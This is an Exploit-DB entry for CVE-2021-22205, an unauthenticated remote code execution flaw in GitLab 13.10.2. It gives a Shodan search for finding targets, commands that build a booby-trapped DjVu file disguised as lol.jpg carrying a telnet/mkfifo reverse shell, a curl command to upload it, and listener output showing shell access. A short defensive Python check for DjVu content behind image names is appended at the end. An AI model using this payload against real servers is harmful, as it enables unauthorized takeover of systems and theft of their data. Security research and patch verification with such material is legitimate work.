GitLab 13.10.2 – Remote Code Execution (RCE) (Unauthenticated)

  • Author: Jacob Baines
    Date: 2021-11-17
  • Category:
    Platform:
  • Source: https://www.exploit-db.com/exploits/50532/
  • # Exploit Title: GitLab 13.10.2 - Remote Code Execution (RCE) (Unauthenticated)
    # Shodan Dork: https://www.shodan.io/search?query=title%3A%22GitLab%22+%2B%22Server%3A+nginx%22
    # Date: 11/01/2021
    # Exploit Author: Jacob Baines
    # Vendor Homepage: https://about.gitlab.com/
    # Software Link: https://gitlab.com/gitlab-org/gitlab
    # Version: GitLab Community Edition and Enterprise Edition before 13.10.3, 13.9.6, and 13.8.8
    # Tested on: GitLab Community Edition 13.10.2 and 13.10.1 (Ubuntu)
    # CVE : CVE-2021-22205
    # Vendor Advisory: https://about.gitlab.com/releases/2021/04/14/security-release-gitlab-13-10-3-released/
    # Root Cause Analysis: https://attackerkb.com/topics/D41jRUXCiJ/cve-2021-22205/rapid7-analysis?referrer=activityFeed
    
    Code execution is the result of GitLab allowing remote unauthenticated attackers to provide DjVu files to ExifTool (see: CVE-2021-22204). As such, exploitation of GitLab takes two steps: first generating the payload, then sending it.
    
    1. Generating the payload. This generates a DjVu image named lol.jpg that will trigger a reverse shell to 10.0.0.3 port 1270.
    
    echo -e
    "QVQmVEZPUk0AAAOvREpWTURJUk0AAAAugQACAAAARgAAAKz//96/mSAhyJFO6wwHH9LaiOhr5kQPLHEC7knTbpW9osMiP0ZPUk0AAABeREpWVUlORk8AAAAKAAgACBgAZAAWAElOQ0wAAAAPc2hhcmVkX2Fubm8uaWZmAEJHNDQAAAARAEoBAgAIAAiK5uGxN9l/KokAQkc0NAAAAAQBD/mfQkc0NAAAAAICCkZPUk0AAAMHREpWSUFOVGEAAAFQKG1ldGFkYXRhCgkoQ29weXJpZ2h0ICJcCiIgLiBxeHs="
    | base64 -d > lol.jpg
    echo -n 'TF=$(mktemp -u);mkfifo $TF && telnet 10.0.0.3 1270 0<$TF | sh 1>$TF' >> lol.jpg
    echo -n
    "fSAuIFwKIiBiICIpICkgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgCg=="
    | base64 -d >> lol.jpg
    
    2. Sending the payload. Any random endpoint will do.
    
    curl -v -F 'file=@lol.jpg' http://10.0.0.7/$(openssl rand -hex 8)
    
    2a. Sample Output from the reverse shell:
    
    $ nc -lnvp 1270
    Listening on [0.0.0.0] (family 0, port 1270)
    Connection from [10.0.0.7] port 1270 [tcp/*] accepted (family 2, sport 34836)
    whoami
    git
    id
    uid=998(git) gid=998(git) groups=998(git)
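
A defensive check for the condition described above, a DjVu file delivered under an image name such as lol.jpg, written as an added example that is not part of the original advisory or of GitLab's code. The function names, the extension allow-list and the sample byte strings are assumptions made for illustration.

```python
import struct
from pathlib import PurePath

# Magic bytes each image extension should start with (assumed allow-list).
MAGIC = {
    ".jpg": (b"\xff\xd8\xff",),
    ".jpeg": (b"\xff\xd8\xff",),
    ".png": (b"\x89PNG\r\n\x1a\n",),
    ".gif": (b"GIF87a", b"GIF89a"),
    ".tif": (b"II*\x00", b"MM\x00*"),
    ".tiff": (b"II*\x00", b"MM\x00*"),
}
# IFF form types that mark a DjVu document or component.
DJVU_FORMS = {b"DJVU", b"DJVM", b"DJVI", b"THUM"}


def djvu_form(data: bytes):
    """Return the DjVu form type if data opens with an AT&T IFF header."""
    # Layout: "AT&T" + "FORM" + 4-byte big-endian length + 4-byte form type.
    if len(data) < 16 or data[:8] != b"AT&TFORM":
        return None
    form = data[12:16]
    return form.decode("ascii") if form in DJVU_FORMS else None


def triage_upload(filename: str, data: bytes) -> str:
    """Classify an upload as 'ok' or 'reject: <reason>' by name vs. content."""
    ext = PurePath(filename).suffix.lower()
    form = djvu_form(data)
    if form:
        return f"reject: DjVu ({form}) content in file named {ext or 'without extension'}"
    if ext not in MAGIC:
        return f"reject: extension {ext!r} not on the image allow-list"
    if not data.startswith(MAGIC[ext]):
        return f"reject: content does not match {ext} magic bytes"
    return "ok"


# Constructed samples: only headers, no real image or DjVu body.
DJVU_AS_JPG = b"AT&TFORM" + struct.pack(">I", 4) + b"DJVM"
REAL_JPG = b"\xff\xd8\xff\xe0\x00\x10JFIF\x00"

if __name__ == "__main__":
    print(triage_upload("lol.jpg", DJVU_AS_JPG))
    print(triage_upload("photo.jpg", REAL_JPG))
```

Content sniffing like this narrows what reaches a metadata parser; it does not replace upgrading to the fixed releases listed above (13.10.3, 13.9.6, 13.8.8).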